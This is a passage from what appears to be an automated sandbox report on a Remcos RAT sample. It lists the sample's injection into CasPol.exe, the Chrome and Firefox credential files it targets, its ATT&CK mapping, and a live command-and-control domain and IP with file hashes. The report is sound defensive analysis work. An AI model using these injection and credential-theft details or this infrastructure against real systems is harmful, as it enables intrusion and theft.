          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040BD37
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00407C97
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A126B0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,1_2_00007FF774A126B0
          Source: C1ZsNxSer8.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_6-48845
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004349F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041CB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004432B5 mov eax, dword ptr fs:[00000030h]6_2_004432B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00412077 GetProcessHeap,HeapFree,6_2_00412077
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A05760 RtlAddVectoredExceptionHandler,1_2_00007FF774A05760
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A69A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF774A69A88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004349F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00434B47 SetUnhandledExceptionFilter,6_2_00434B47
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043BB22
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00434FDC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000Jump to behavior
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B96008Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_004120F7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00419627 mouse_event,6_2_00419627
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAc
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A05410 cpuid 1_2_00007FF774A05410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,6_2_0040F8D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00452036
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_004520C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,6_2_00452313
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00448404
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0045243C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,6_2_00452543
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00452610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,6_2_004488ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00451CD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00451F50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00451F9B
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A6955C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF774A6955C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041B60D GetComputerNameExW,GetUserNameW,6_2_0041B60D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_00449190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0040BA12
          Contains functionality to steal Firefox passwords or cookies
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0040BB30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db6_2_0040BB30

          Remote Access Functionality

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe6_2_0040569A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		12
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		1
          Windows Service          		1
          Bypass User Account Control          		2
          Obfuscated Files or Information          		111
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol111
          Input Capture          		2
          Encrypted Channel          		Exfiltration Over Bluetooth1
          Defacement
          Email AddressesDNS ServerDomain Accounts2
          Service Execution          		Logon Script (Windows)1
          Access Token Manipulation          		1
          Software Packing          		2
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Windows Service          		1
          DLL Side-Loading          		NTDS2
          File and Directory Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
          Process Injection          		1
          Bypass User Account Control          		LSA Secrets24
          System Information Discovery          		SSHKeylogging12
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials21
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync2
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
          Process Injection          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          C1ZsNxSer8.exe24%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://geoplugin.net/json.gp0%URL Reputationsafe
          http://geoplugin.net/json.gp/C0%URL Reputationsafe
          https://aka.ms/nativeaot-compatibility0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
          https://aka.ms/GlobalizationInvariantMode0%Avira URL Cloudsafe
          unifrieghtmovers.com0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-compatibilityX0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-compatibilityY0%Avira URL Cloudsafe
          https://aka.ms/nativeaot-c0%Avira URL Cloudsafe
          http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
          http://geoplugin.net/json.gp-0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          geoplugin.net
          		178.237.33.50
          		truefalse
            		unknown
            unifrieghtmovers.com
            		23.95.60.82
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              		unknown
              unifrieghtmovers.comtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/GlobalizationInvariantModeC1ZsNxSer8.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp/CC1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://geoplugin.net/json.gplCasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-cC1ZsNxSer8.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gpSystem32CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-compatibilityC1ZsNxSer8.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-compatibilityYC1ZsNxSer8.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/nativeaot-compatibilityyC1ZsNxSer8.exefalse
                		unknown
                https://aka.ms/nativeaot-compatibilityXC1ZsNxSer8.exe, 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp-CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse
                23.95.60.82
                		unifrieghtmovers.comUnited States
                		36352AS-COLOCROSSINGUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482895
                Start date and time:2024-07-26 10:37:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 52s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:C1ZsNxSer8.exe
                renamed because original name is a hash value
                Original Sample Name:4fb3e6e7b8f9c12cd2d5e161f7b94760.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@4/1@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 57%
                • Number of executed functions: 60
                • Number of non-executed functions: 231
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: C1ZsNxSer8.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                06:21:01API Interceptor5458638x Sleep call for process: CasPol.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.237.33.50Quotation.xlsGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • geoplugin.net/json.gp
                remcos.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                ogetback.docGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                23.95.60.82Quotation.xlsGet hashmaliciousRemcosBrowse
                  QUOTATION#06232024.exeGet hashmaliciousRemcosBrowse
                    RFQ00978-Abu Dhabi Hardware.exeGet hashmaliciousRemcosBrowse
                      PO#BR23-67981-BIO.exeGet hashmaliciousRemcosBrowse
                        MACHINE QUOTATION.exeGet hashmaliciousRemcosBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          geoplugin.netQuotation.xlsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 178.237.33.50
                          remcos.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          ogetback.docGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          unifrieghtmovers.comQuotation.xlsGet hashmaliciousRemcosBrowse
                          • 23.95.60.82

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AS-COLOCROSSINGUSQuotation.xlsGet hashmaliciousRemcosBrowse
                          • 23.95.60.82
                          #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                          • 198.46.176.133
                          BilseMHALF.rtfGet hashmaliciousUnknownBrowse
                          • 172.245.123.11
                          2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                          • 198.46.174.139
                          DBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                          • 107.174.69.116
                          LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                          • 107.175.229.139
                          LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                          • 108.174.60.238
                          042240724.xlsGet hashmaliciousRemcosBrowse
                          • 198.46.176.133
                          LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                          • 107.175.229.139
                          LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                          • 107.175.229.139
                          ATOM86-ASATOM86NLQuotation.xlsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          IAENMAIL-A4-240717-0830-000090912_PDF.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          CDG__ Copia de Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 178.237.33.50
                          remcos.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          ogetback.docGet hashmaliciousRemcosBrowse
                          • 178.237.33.50

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):962
                          Entropy (8bit):5.013130376969173
                          Encrypted:false
                          SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                          MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                          SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                          SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                          SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                          Static File Info

                          General

                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):7.219441527091625
                          TrID:
                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                          • Win64 Executable GUI (202006/5) 46.43%
                          • Win64 Executable (generic) (12005/4) 2.76%
                          • Generic Win/DOS Executable (2004/3) 0.46%
                          • DOS Executable Generic (2002/1) 0.46%
                          File name:C1ZsNxSer8.exe
                          File size:2'673'152 bytes
                          MD5:4fb3e6e7b8f9c12cd2d5e161f7b94760
                          SHA1:57bdad62c6ea7f1b905c900302f918d185811a94
                          SHA256:f76f9b85df2ba8850bec058164d2c752c8fd8ef0f1bcffd793e5f453d8a839bb
                          SHA512:f762ad1ccd537d06c1cf3538e433671f441f100b06d37ec34b3a3e76dfbfad40ac7ca50ee32297c54f628b0b89d75c2c5255166cc992f9bcff8f117f70aa179a
                          SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
